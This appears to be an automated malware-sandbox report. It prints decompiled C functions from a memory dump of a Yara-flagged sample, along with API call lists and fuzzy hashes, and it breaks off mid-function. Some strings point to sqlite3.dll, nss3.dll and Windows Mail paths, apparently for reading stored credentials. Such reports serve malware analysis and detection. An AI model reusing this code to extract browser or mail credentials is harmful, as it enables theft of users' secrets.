                                                                                				intOrPtr _v8;
                                                                                				signed int _v12;
                                                                                				intOrPtr _v16;
                                                                                				intOrPtr _v20;
                                                                                				void* __ebx;
                                                                                				signed int _t63;
                                                                                				intOrPtr _t67;
                                                                                				intOrPtr _t72;
                                                                                				intOrPtr _t74;
                                                                                				signed int _t79;
                                                                                				void* _t84;
                                                                                				signed int _t86;
                                                                                				char* _t98;
                                                                                				void* _t100;
                                                                                				void* _t102;
                                                                                				void* _t104;
                                                                                				void* _t106;
                                                                                				void* _t107;
                                                                                
                                                                                				_t84 = __eax;
                                                                                				E0040892D(__eax, __eflags);
                                                                                				_t86 = 0;
                                                                                				_v12 = 0;
                                                                                				while(1) {
                                                                                					_t98 = _a4;
                                                                                					if( *((intOrPtr*)(_t86 + _t98)) - 0x30 > 9) {
                                                                                						break;
                                                                                					}
                                                                                					_t86 = _t86 + 1;
                                                                                					if(_t86 < 1) {
                                                                                						continue;
                                                                                					}
                                                                                					if(strlen(_t98) >= 3) {
                                                                                						break;
                                                                                					}
                                                                                					_t79 = atoi(_a4);
                                                                                					if(_t79 >= 0 && _t79 <  *((intOrPtr*)(_t84 + 0x20))) {
                                                                                						_v12 =  *((intOrPtr*)( *( *((intOrPtr*)(_t84 + 0x24)) + _t79 * 4) * 0x14 +  *((intOrPtr*)(_t84 + 0x1b4))));
                                                                                					}
                                                                                					L21:
                                                                                					if(_a8 != 0) {
                                                                                						_v12 = _v12 | 0x00001000;
                                                                                					}
                                                                                					_t63 = _v12;
                                                                                					 *0x41748c =  *0x41748c + 1;
                                                                                					 *((intOrPtr*)(0x417490 +  *0x41748c * 4)) = _t63;
                                                                                					return _t63;
                                                                                				}
                                                                                				_t104 = 0;
                                                                                				__eflags =  *((intOrPtr*)(_t84 + 0x1b0));
                                                                                				_v16 = 0;
                                                                                				_v8 = 0;
                                                                                				if( *((intOrPtr*)(_t84 + 0x1b0)) <= 0) {
                                                                                					L14:
                                                                                					_t100 = 0;
                                                                                					__eflags =  *((intOrPtr*)(_t84 + 0x1b0));
                                                                                					_v8 = 0;
                                                                                					if( *((intOrPtr*)(_t84 + 0x1b0)) <= 0) {
                                                                                						L20:
                                                                                						goto L21;
                                                                                					}
                                                                                					_t106 = 0;
                                                                                					__eflags = 0;
                                                                                					do {
                                                                                						_v20 = E004069D2(0, _a4);
                                                                                						_t67 = E004069D2(0, _a4);
                                                                                						__eflags = _v20;
                                                                                						if(_v20 >= 0) {
                                                                                							L18:
                                                                                							_v12 =  *((intOrPtr*)(_t106 +  *((intOrPtr*)(_t84 + 0x1b4))));
                                                                                							goto L19;
                                                                                						}
                                                                                						__eflags = _t67;
                                                                                						if(_t67 < 0) {
                                                                                							goto L19;
                                                                                						}
                                                                                						goto L18;
                                                                                						L19:
                                                                                						_v8 = _v8 + 1;
                                                                                						_t100 = _t100 + 0x10;
                                                                                						_t106 = _t106 + 0x14;
                                                                                						__eflags = _v8 -  *((intOrPtr*)(_t84 + 0x1b0));
                                                                                					} while (_v8 <  *((intOrPtr*)(_t84 + 0x1b0)));
                                                                                					goto L20;
                                                                                				}
                                                                                				_t102 = 0;
                                                                                				__eflags = 0;
                                                                                				do {
                                                                                					_t72 =  *((intOrPtr*)( *((intOrPtr*)(_t84 + 0x1b4)) + _t104 + 0x10));
                                                                                					_push(_a4);
                                                                                					_push(_t72);
                                                                                					L004115C4();
                                                                                					_push(_a4);
                                                                                					_v20 = _t72;
                                                                                					_t74 =  *((intOrPtr*)( *((intOrPtr*)(_t84 + 0x34)) + _t102 + 0xc));
                                                                                					_push(_t74);
                                                                                					L004115C4();
                                                                                					_t107 = _t107 + 0x10;
                                                                                					__eflags = _v20;
                                                                                					if(_v20 == 0) {
                                                                                						L11:
                                                                                						_v12 =  *(_t104 +  *((intOrPtr*)(_t84 + 0x1b4)));
                                                                                						_v16 = 1;
                                                                                						goto L12;
                                                                                					}
                                                                                					__eflags = _t74;
                                                                                					if(_t74 != 0) {
                                                                                						goto L12;
                                                                                					}
                                                                                					goto L11;
                                                                                					L12:
                                                                                					_v8 = _v8 + 1;
                                                                                					_t102 = _t102 + 0x10;
                                                                                					_t104 = _t104 + 0x14;
                                                                                					__eflags = _v8 -  *((intOrPtr*)(_t84 + 0x1b0));
                                                                                				} while (_v8 <  *((intOrPtr*)(_t84 + 0x1b0)));
                                                                                				__eflags = _v16;
                                                                                				if(_v16 != 0) {
                                                                                					goto L20;
                                                                                				}
                                                                                				goto L14;
                                                                                			}






















                                                                                APIs
                                                                                  • Part of subcall function 0040892D: ??2@YAPAXI@Z.MSVCRT ref: 0040894E
                                                                                  • Part of subcall function 0040892D: ??3@YAXPAX@Z.MSVCRT ref: 00408A15
                                                                                • strlen.MSVCRT ref: 0040A13F
                                                                                • atoi.MSVCRT ref: 0040A14D
                                                                                • _mbsicmp.MSVCRT ref: 0040A1A0
                                                                                • _mbsicmp.MSVCRT ref: 0040A1B3
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: _mbsicmp$??2@??3@atoistrlen
                                                                                • String ID:
                                                                                • API String ID: 4107816708-0
                                                                                • Opcode ID: 04d0626d4e34a8bed9540d47d501c89c47d505d3d6eba4bb40819434c6ba53c8
                                                                                • Instruction ID: ad5e67b725479cd3c0fe98911646f79d6f4c04cefe3616236e53ea043d5b2769
                                                                                • Opcode Fuzzy Hash: 04d0626d4e34a8bed9540d47d501c89c47d505d3d6eba4bb40819434c6ba53c8
                                                                                • Instruction Fuzzy Hash: 24414B75900304AFCB10DFA9C580A9ABBF5FB48308F1084BEEC05AB392D7399A51CB59
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E00410E8A(char* __eax, void* __edi) {
                                                                                				unsigned int _v5;
                                                                                				signed int _v6;
                                                                                				signed int _v7;
                                                                                				intOrPtr _v12;
                                                                                				intOrPtr _v16;
                                                                                				intOrPtr _t37;
                                                                                				char* _t56;
                                                                                				signed char _t57;
                                                                                				char* _t67;
                                                                                				void* _t68;
                                                                                				void* _t69;
                                                                                
                                                                                				_t68 = __edi;
                                                                                				_t56 = __eax;
                                                                                				_t69 = 0;
                                                                                				_t37 = strlen(__eax) + 0xfffffffd;
                                                                                				_v16 = _t37;
                                                                                				if(_t37 < 0) {
                                                                                					L18:
                                                                                					 *((char*)(_t69 + _t68)) = 0;
                                                                                					return _t69;
                                                                                				}
                                                                                				_v12 = 0xfffffffe;
                                                                                				_v12 = _v12 - _t56;
                                                                                				_t5 = _t56 + 2; // 0x411004
                                                                                				_t67 = _t5;
                                                                                				while(1) {
                                                                                					_t6 = _t67 - 2; // 0x75fff88b
                                                                                					_t39 =  *_t6;
                                                                                					if( *_t6 != 0x2e) {
                                                                                						_v6 = E00410E56(_t39);
                                                                                					} else {
                                                                                						_v6 = 0x3e;
                                                                                					}
                                                                                					_t9 = _t67 - 1; // 0xfc75fff8
                                                                                					_t41 =  *_t9;
                                                                                					if( *_t9 != 0x2e) {
                                                                                						_v5 = E00410E56(_t41);
                                                                                					} else {
                                                                                						_v5 = 0x3e;
                                                                                					}
                                                                                					_t43 =  *_t67;
                                                                                					if( *_t67 != 0x2e) {
                                                                                						_t57 = E00410E56(_t43);
                                                                                					} else {
                                                                                						_t57 = 0x3e;
                                                                                					}
                                                                                					_t45 =  *((intOrPtr*)(_t67 + 1));
                                                                                					if( *((intOrPtr*)(_t67 + 1)) != 0x2e) {
                                                                                						_v7 = E00410E56(_t45);
                                                                                					} else {
                                                                                						_v7 = 0x3e;
                                                                                					}
                                                                                					 *(_t68 + _t69) = _v5 >> 0x00000004 | _v6 << 0x00000002;
                                                                                					if( *_t67 == 0x2d) {
                                                                                						break;
                                                                                					}
                                                                                					 *(_t69 + _t68 + 1) = _t57 >> 0x00000002 | _v5 << 0x00000004;
                                                                                					if( *((char*)(_t67 + 1)) == 0x2d) {
                                                                                						 *((char*)(_t69 + _t68 + 2)) = 0;
                                                                                						_t34 = _t69 + 2; // 0x2
                                                                                						return _t34;
                                                                                					}
                                                                                					_t69 = _t69 + 3;
                                                                                					 *(_t69 + _t68 - 1) = _t57 << 0x00000006 | _v7;
                                                                                					_t25 = _t69 + 5; // 0x2
                                                                                					_t67 = _t67 + 4;
                                                                                					if(_t25 >= 0x3ff || _v12 + _t67 > _v16) {
                                                                                						goto L18;
                                                                                					} else {
                                                                                						continue;
                                                                                					}
                                                                                				}
                                                                                				 *(_t69 + _t68 + 1) = 0;
                                                                                				_t31 = _t69 + 1; // 0x1
                                                                                				return _t31;
                                                                                			}















                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: strlen
                                                                                • String ID: >$>$>
                                                                                • API String ID: 39653677-3911187716
                                                                                • Opcode ID: cc9d2e4949e9ff96ebc93a83fa171427e13732e23a33d014681ceaf85bfc699f
                                                                                • Instruction ID: 69dee6f6c2e5f632f5f5b053a668a00b89048f502478ac4f4f3cd81ce8891ac8
                                                                                • Opcode Fuzzy Hash: cc9d2e4949e9ff96ebc93a83fa171427e13732e23a33d014681ceaf85bfc699f
                                                                                • Instruction Fuzzy Hash: D331D5318097C49ED7218B6980563EFFFA14F26304F188ADAD0E557343D2EC96CAC75A
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 50%
                                                                                			E0040BC6D(signed int __eax, void* __ecx, void* _a4) {
                                                                                				unsigned int _t23;
                                                                                				signed int _t25;
                                                                                				unsigned int _t34;
                                                                                				unsigned int _t36;
                                                                                				void* _t40;
                                                                                				unsigned int _t45;
                                                                                				void* _t46;
                                                                                				int _t47;
                                                                                				void* _t48;
                                                                                				void* _t50;
                                                                                
                                                                                				_t48 = __ecx;
                                                                                				_t34 = __eax;
                                                                                				_t23 =  *(__ecx + 0x10);
                                                                                				_t36 = _t23 + __eax * 8;
                                                                                				 *(__ecx + 0x10) = _t36;
                                                                                				if(_t36 < _t23) {
                                                                                					 *((intOrPtr*)(__ecx + 0x14)) =  *((intOrPtr*)(__ecx + 0x14)) + 1;
                                                                                				}
                                                                                				 *((intOrPtr*)(_t48 + 0x14)) =  *((intOrPtr*)(_t48 + 0x14)) + (_t34 >> 0x1d);
                                                                                				_t25 = _t23 >> 0x00000003 & 0x0000003f;
                                                                                				if(_t25 == 0) {
                                                                                					L6:
                                                                                					if(_t34 >= 0x40) {
                                                                                						_t45 = _t34 >> 6;
                                                                                						do {
                                                                                							memcpy(_t48 + 0x18, _a4, 0x40);
                                                                                							_t50 = _t50 + 0xc;
                                                                                							E0040BD8A(_t48 + 0x18, _t48);
                                                                                							_a4 = _a4 + 0x40;
                                                                                							_t34 = _t34 - 0x40;
                                                                                							_t45 = _t45 - 1;
                                                                                						} while (_t45 != 0);
                                                                                					}
                                                                                					_push(_t34);
                                                                                					_push(_a4);
                                                                                					_push(_t48 + 0x18);
                                                                                				} else {
                                                                                					_t46 = 0x40;
                                                                                					_t47 = _t46 - _t25;
                                                                                					_t40 = _t48 + 0x18 + _t25;
                                                                                					if(_t34 >= _t47) {
                                                                                						memcpy(_t40, _a4, _t47);
                                                                                						_t50 = _t50 + 0xc;
                                                                                						E0040BD8A(_t48 + 0x18, _t48);
                                                                                						_a4 = _a4 + _t47;
                                                                                						_t34 = _t34 - _t47;
                                                                                						goto L6;
                                                                                					} else {
                                                                                						_push(_t34);
                                                                                						_push(_a4);
                                                                                						_push(_t40);
                                                                                					}
                                                                                				}
                                                                                				return memcpy();
                                                                                			}














                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: memcpy
                                                                                • String ID: @
                                                                                • API String ID: 3510742995-2766056989
                                                                                • Opcode ID: 72109dd3c061e5e7965399845177051784b2c116136a58e32e92d3e3a8f21608
                                                                                • Instruction ID: cecad1072309209c94eeb2778a75b30bbc980c70aaade9bdc77468b7d13379ad
                                                                                • Opcode Fuzzy Hash: 72109dd3c061e5e7965399845177051784b2c116136a58e32e92d3e3a8f21608
                                                                                • Instruction Fuzzy Hash: 8B112BB29003056BDB288F16D8809AA77EAEF50344700063FFD0796291FB39DE55C6DC
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 93%
                                                                                			E00406F6F(void** __esi, intOrPtr _a4, intOrPtr _a8) {
                                                                                				signed int _t21;
                                                                                				signed int _t23;
                                                                                				void* _t24;
                                                                                				signed int _t31;
                                                                                				void* _t33;
                                                                                				void* _t44;
                                                                                				signed int _t46;
                                                                                				void* _t48;
                                                                                				signed int _t51;
                                                                                				int _t52;
                                                                                				void** _t53;
                                                                                				void* _t58;
                                                                                
                                                                                				_t53 = __esi;
                                                                                				_t1 =  &(_t53[1]); // 0x0
                                                                                				_t51 =  *_t1;
                                                                                				_t21 = 0;
                                                                                				if(_t51 <= 0) {
                                                                                					L4:
                                                                                					_t2 =  &(_t53[2]); // 0x8
                                                                                					_t33 =  *_t53;
                                                                                					_t23 =  *_t2 + _t51;
                                                                                					_t46 = 8;
                                                                                					_t53[1] = _t23;
                                                                                					_t24 = _t23 * _t46;
                                                                                					_push( ~(0 | _t58 > 0x00000000) | _t24);
                                                                                					L004115D0();
                                                                                					_t10 =  &(_t53[1]); // 0x0
                                                                                					 *_t53 = _t24;
                                                                                					memset(_t24, 0,  *_t10 << 3);
                                                                                					_t52 = _t51 << 3;
                                                                                					memcpy( *_t53, _t33, _t52);
                                                                                					if(_t33 != 0) {
                                                                                						_push(_t33);
                                                                                						L004115D6();
                                                                                					}
                                                                                					 *((intOrPtr*)( *_t53 + _t52)) = _a4;
                                                                                					 *((intOrPtr*)(_t52 +  *_t53 + 4)) = _a8;
                                                                                				} else {
                                                                                					_t44 =  *__esi;
                                                                                					_t48 = _t44;
                                                                                					while( *_t48 != 0) {
                                                                                						_t21 = _t21 + 1;
                                                                                						_t48 = _t48 + 8;
                                                                                						_t58 = _t21 - _t51;
                                                                                						if(_t58 < 0) {
                                                                                							continue;
                                                                                						} else {
                                                                                							goto L4;
                                                                                						}
                                                                                						goto L7;
                                                                                					}
                                                                                					_t31 = _t21 << 3;
                                                                                					 *((intOrPtr*)(_t44 + _t31)) = _a4;
                                                                                					 *((intOrPtr*)(_t31 +  *_t53 + 4)) = _a8;
                                                                                				}
                                                                                				L7:
                                                                                				return 1;
                                                                                			}
















                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ??2@??3@memcpymemset
                                                                                • String ID:
                                                                                • API String ID: 1865533344-0
                                                                                • Opcode ID: 51d873ac656c15b7a7b4c95b09edac65cc2407af7c36c5c472b2660f0814b8dc
                                                                                • Instruction ID: 30667c860212afb2fcb1bf0ba773cc68d22997902d766bb0abd15f5aaececc89
                                                                                • Opcode Fuzzy Hash: 51d873ac656c15b7a7b4c95b09edac65cc2407af7c36c5c472b2660f0814b8dc
                                                                                • Instruction Fuzzy Hash: 81118F71204601AFD328DF1DD881A27F7E6FFD8340B21892EE59B87391DA35E841CB54
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 37%
                                                                                			E0040EFAE(char* __esi, char _a4, intOrPtr _a8) {
                                                                                				void* _v8;
                                                                                				char* _v16;
                                                                                				intOrPtr _v20;
                                                                                				intOrPtr _v24;
                                                                                				intOrPtr _v28;
                                                                                				intOrPtr _v32;
                                                                                				intOrPtr _v36;
                                                                                				char _v40;
                                                                                				char _v304;
                                                                                				char* _t18;
                                                                                				char* _t22;
                                                                                				char* _t23;
                                                                                				intOrPtr* _t24;
                                                                                				intOrPtr* _t26;
                                                                                				intOrPtr _t30;
                                                                                				void* _t35;
                                                                                				char* _t36;
                                                                                
                                                                                				_t18 =  &_v8;
                                                                                				_t30 = 0;
                                                                                				__imp__SHGetMalloc(_t18);
                                                                                				if(_t18 >= 0) {
                                                                                					_v40 = _a4;
                                                                                					_v28 = _a8;
                                                                                					_t22 =  &_v40;
                                                                                					_v36 = 0;
                                                                                					_v32 = 0;
                                                                                					_v24 = 4;
                                                                                					_v20 = E0040EF36;
                                                                                					_v16 = __esi;
                                                                                					__imp__SHBrowseForFolderA(_t22, _t35);
                                                                                					_t36 = _t22;
                                                                                					if(_t36 != 0) {
                                                                                						_t23 =  &_v304;
                                                                                						__imp__SHGetPathFromIDListA(_t36, _t23);
                                                                                						if(_t23 != 0) {
                                                                                							_t30 = 1;
                                                                                							strcpy(__esi,  &_v304);
                                                                                						}
                                                                                						_t24 = _v8;
                                                                                						 *((intOrPtr*)( *_t24 + 0x14))(_t24, _t36);
                                                                                						_t26 = _v8;
                                                                                						 *((intOrPtr*)( *_t26 + 8))(_t26);
                                                                                					}
                                                                                				}
                                                                                				return _t30;
                                                                                			}





















                                                                                APIs
                                                                                • SHGetMalloc.SHELL32(?), ref: 0040EFBE
                                                                                • SHBrowseForFolderA.SHELL32(?), ref: 0040EFF0
                                                                                • SHGetPathFromIDListA.SHELL32(00000000,?), ref: 0040F004
                                                                                • strcpy.MSVCRT(?,?), ref: 0040F017
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: BrowseFolderFromListMallocPathstrcpy
                                                                                • String ID:
                                                                                • API String ID: 409945605-0
                                                                                • Opcode ID: 363e444f0183eb3209581039a296e9ed2a0e0cb40b9c5b89ec9b93d888cfbacc
                                                                                • Instruction ID: 0bece651b4572a5d25d0fced66708dfb83f65978f11dfbdadd7c1eadd6bf4f14
                                                                                • Opcode Fuzzy Hash: 363e444f0183eb3209581039a296e9ed2a0e0cb40b9c5b89ec9b93d888cfbacc
                                                                                • Instruction Fuzzy Hash: DD11F7B5900208AFCB10DFA9D9889EEBBFCFB49310F10447AEA05E7241D779DA458B64
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 80%
                                                                                			E0040A437(void* __esi) {
                                                                                				void* _v260;
                                                                                				char _v516;
                                                                                				void* __ebx;
                                                                                				char* _t16;
                                                                                				signed short _t25;
                                                                                				signed short _t27;
                                                                                				void* _t28;
                                                                                
                                                                                				_t28 = __esi;
                                                                                				_push(E00408647( *((intOrPtr*)(__esi + 0x370))));
                                                                                				_t25 = 4;
                                                                                				sprintf( &_v260, E004078FF(_t25));
                                                                                				_t16 = E00408BDE( *((intOrPtr*)(__esi + 0x370)), 0);
                                                                                				if(_t16 > 0) {
                                                                                					_push(_t16);
                                                                                					_t27 = 5;
                                                                                					sprintf( &_v516, E004078FF(_t27));
                                                                                					_t16 = strcat( &_v260,  &_v516);
                                                                                				}
                                                                                				if( *((intOrPtr*)(_t28 + 0x108)) != 0) {
                                                                                					return SendMessageA( *(_t28 + 0x114), 0x401, 0,  &_v260);
                                                                                				}
                                                                                				return _t16;
                                                                                			}











                                                                                APIs
                                                                                  • Part of subcall function 004078FF: LoadStringA.USER32 ref: 004079C8
                                                                                  • Part of subcall function 004078FF: memcpy.MSVCRT ref: 00407A07
                                                                                • sprintf.MSVCRT ref: 0040A45D
                                                                                • SendMessageA.USER32 ref: 0040A4C0
                                                                                  • Part of subcall function 004078FF: strcpy.MSVCRT(004172C0,strings,?,?,00408822,?,?,?,?,?,00000000,73B74DE0), ref: 0040797A
                                                                                  • Part of subcall function 004078FF: strlen.MSVCRT ref: 00407998
                                                                                • sprintf.MSVCRT ref: 0040A487
                                                                                • strcat.MSVCRT(?,?,?,00000000,00000000), ref: 0040A49A
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: sprintf$LoadMessageSendStringmemcpystrcatstrcpystrlen
                                                                                • String ID:
                                                                                • API String ID: 919693953-0
                                                                                • Opcode ID: 90207433884269e3a26f13c39c42963f5ff8dc1025de2d2684d4a636a9e51624
                                                                                • Instruction ID: 75288aada6eb4f7a447a9cf13bdf828529425e42ebb21a5188d22772f738aad9
                                                                                • Opcode Fuzzy Hash: 90207433884269e3a26f13c39c42963f5ff8dc1025de2d2684d4a636a9e51624
                                                                                • Instruction Fuzzy Hash: 2601DBB250030466D721B775DD86FEB73AC6F00304F40447BB74AF6082DABCE9808B29
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 87%
                                                                                			E0040F3BA(char* _a4) {
                                                                                				void _v267;
                                                                                				char _v268;
                                                                                				int _t12;
                                                                                				signed int _t16;
                                                                                
                                                                                				_v268 = 0;
                                                                                				memset( &_v267, 0, 0x104);
                                                                                				_t12 = strlen(_a4);
                                                                                				_t5 = strlen("sqlite3.dll") + 1; // 0x1
                                                                                				if(_t12 + _t5 >= 0x104) {
                                                                                					_v268 = 0;
                                                                                				} else {
                                                                                					E004062AD( &_v268, _a4, "sqlite3.dll");
                                                                                				}
                                                                                				_t16 = E0040614B( &_v268);
                                                                                				asm("sbb eax, eax");
                                                                                				return  ~( ~_t16);
                                                                                			}








                                                                                APIs
                                                                                • memset.MSVCRT ref: 0040F3DC
                                                                                • strlen.MSVCRT ref: 0040F3E4
                                                                                • strlen.MSVCRT ref: 0040F3F1
                                                                                  • Part of subcall function 004062AD: strcpy.MSVCRT(00000000,00000000,sqlite3.dll,00402138,00000000,nss3.dll), ref: 004062B5
                                                                                  • Part of subcall function 004062AD: strcat.MSVCRT(00000000,00000000,00000000,00000000,sqlite3.dll,00402138,00000000,nss3.dll), ref: 004062C4
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: strlen$memsetstrcatstrcpy
                                                                                • String ID: sqlite3.dll
                                                                                • API String ID: 1581230619-1155512374
                                                                                • Opcode ID: 3cb808dc3fd31d135458d717301fbb3bbf110c950f4aa8e177593d82486e3e62
                                                                                • Instruction ID: fec7c4afce47c381fe657df57b8ff367c384fd882de8837a2d08c6e6e293e1f2
                                                                                • Opcode Fuzzy Hash: 3cb808dc3fd31d135458d717301fbb3bbf110c950f4aa8e177593d82486e3e62
                                                                                • Instruction Fuzzy Hash: 4BF02D3144C1286ADB10E769DC45FCA7BAC8FA1318F1040B7F586E60D2D9B89AC98668
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E004098F4(intOrPtr* __ecx, intOrPtr _a4) {
                                                                                				void _v259;
                                                                                				char _v260;
                                                                                				void _v515;
                                                                                				char _v516;
                                                                                				void* __esi;
                                                                                				void* _t15;
                                                                                				intOrPtr* _t24;
                                                                                				char* _t26;
                                                                                
                                                                                				_t24 = __ecx;
                                                                                				_v260 = 0;
                                                                                				memset( &_v259, 0, 0xfe);
                                                                                				_v516 = 0;
                                                                                				memset( &_v515, 0, 0xfe);
                                                                                				_t15 =  *((intOrPtr*)( *_t24 + 0x20))();
                                                                                				_t26 =  &_v260;
                                                                                				E00409018(_t26, _t15);
                                                                                				sprintf( &_v516, "</%s>\r\n", _t26);
                                                                                				return E00405EFD(_a4,  &_v516);
                                                                                			}












                                                                                APIs
                                                                                • memset.MSVCRT ref: 00409917
                                                                                • memset.MSVCRT ref: 0040992D
                                                                                  • Part of subcall function 00409018: strcpy.MSVCRT(00000000,?,00409701,?,?,?), ref: 0040901D
                                                                                  • Part of subcall function 00409018: _strlwr.MSVCRT ref: 00409060
                                                                                • sprintf.MSVCRT ref: 00409957
                                                                                  • Part of subcall function 00405EFD: strlen.MSVCRT ref: 00405F0A
                                                                                  • Part of subcall function 00405EFD: WriteFile.KERNEL32(00412B1C,00000001,00000000,73B74DE0,00000000,?,?,004092ED,00000001,00412B1C,73B74DE0), ref: 00405F17
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: memset$FileWrite_strlwrsprintfstrcpystrlen
                                                                                • String ID: </%s>
                                                                                • API String ID: 3202206310-259020660
                                                                                • Opcode ID: 8cbe72e2fc2d9776a491eb44f024350a6eb65ee3e03a862d51b3af92fd5e6b23
                                                                                • Instruction ID: adbfc7571eef3522ba50f6b4148bdf50dea618c8f0168b60c77ad4ff43fabaf4
                                                                                • Opcode Fuzzy Hash: 8cbe72e2fc2d9776a491eb44f024350a6eb65ee3e03a862d51b3af92fd5e6b23
                                                                                • Instruction Fuzzy Hash: B201D1729001297AD720A719CC45FDA7AACAF84304F0400FAB60AF3182DA749F848BA8
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E00406734(char* __edi, char* _a4) {
                                                                                				char* _t12;
                                                                                				int _t13;
                                                                                
                                                                                				_t12 = __edi;
                                                                                				_t13 = strlen(__edi);
                                                                                				if(strlen(_a4) + _t13 < 0x104) {
                                                                                					_t2 =  &_a4; // 0x410d64
                                                                                					strcat(_t13 + __edi,  *_t2);
                                                                                				}
                                                                                				return _t12;
                                                                                			}






                                                                                APIs
                                                                                • strlen.MSVCRT ref: 00406736
                                                                                • strlen.MSVCRT ref: 00406741
                                                                                • strcat.MSVCRT(00000000,dA,0000001C,00410D64,\Microsoft\Windows Mail,?,?,?), ref: 00406758
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: strlen$strcat
                                                                                • String ID: dA
                                                                                • API String ID: 2335785903-82490789
                                                                                • Opcode ID: 8b0d949a9835eed74c78f3475c18959fb5a6152aa5369579c15a011cca720fff
                                                                                • Instruction ID: 8adb96eafe51badce5d1f431fd236154b3227263db9247bb640c15329514921a
                                                                                • Opcode Fuzzy Hash: 8b0d949a9835eed74c78f3475c18959fb5a6152aa5369579c15a011cca720fff
                                                                                • Instruction Fuzzy Hash: EFD05E3350852036C5152316BC429DE5B82CBC037CB15445FF609921A1E93D84D1859D
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 89%
                                                                                			E00402221(void* __ecx, intOrPtr _a4, char* _a8) {
                                                                                				void* __ebx;
                                                                                				intOrPtr _t22;
                                                                                				void* _t23;
                                                                                				void* _t25;
                                                                                				void* _t27;
                                                                                				void* _t29;
                                                                                				void* _t32;
                                                                                				void* _t36;
                                                                                				signed short _t42;
                                                                                				char* _t47;
                                                                                				void* _t48;
                                                                                				intOrPtr _t49;
                                                                                				intOrPtr _t50;
                                                                                				void* _t57;
                                                                                
                                                                                				_t22 = _a4;
                                                                                				_t57 = _t22 - 6;
                                                                                				_t47 = _a8;
                                                                                				_t48 = __ecx;
                                                                                				 *_t47 = 0;
                                                                                				if(_t57 > 0) {
                                                                                					_t23 = _t22 - 7;
                                                                                					if(_t23 == 0) {
                                                                                						return __ecx + 0x214;
                                                                                					}
                                                                                					_t25 = _t23 - 1;
                                                                                					if(_t25 == 0) {
                                                                                						return __ecx + 0x294;
                                                                                					}
                                                                                					_t27 = _t25 - 1;
                                                                                					if(_t27 == 0) {
                                                                                						return __ecx + 0x314;
                                                                                					}
                                                                                					_t29 = _t27 - 1;
                                                                                					if(_t29 == 0) {
                                                                                						_t49 =  *((intOrPtr*)(__ecx + 0x3a0));
                                                                                						if(_t49 < 1 || _t49 > 7) {
                                                                                							if(_t49 < 8 || _t49 > 0xe) {
                                                                                								if(_t49 < 0xf || _t49 > 0x19) {
                                                                                									if(_t49 < 0x1a || _t49 > 0x2d) {
                                                                                										if(_t49 < 0x2e) {
                                                                                											L16:
                                                                                											return _t47;
                                                                                										}
                                                                                										_t42 = 0x519;
                                                                                									} else {
                                                                                										_t42 = 0x518;
                                                                                									}
                                                                                								} else {
                                                                                									_t42 = 0x517;
                                                                                								}
                                                                                							} else {
                                                                                								_t42 = 0x516;
                                                                                							}
                                                                                							goto L20;
                                                                                						} else {
                                                                                							_t42 = 0x515;
                                                                                							L20:
                                                                                							return E004078FF(_t42);
                                                                                						}
                                                                                					}
                                                                                					_t32 = _t29 - 1;
                                                                                					if(_t32 == 0) {
                                                                                						return __ecx + 0x190;
                                                                                					}
                                                                                					if(_t32 != 1) {
                                                                                						goto L16;
                                                                                					}
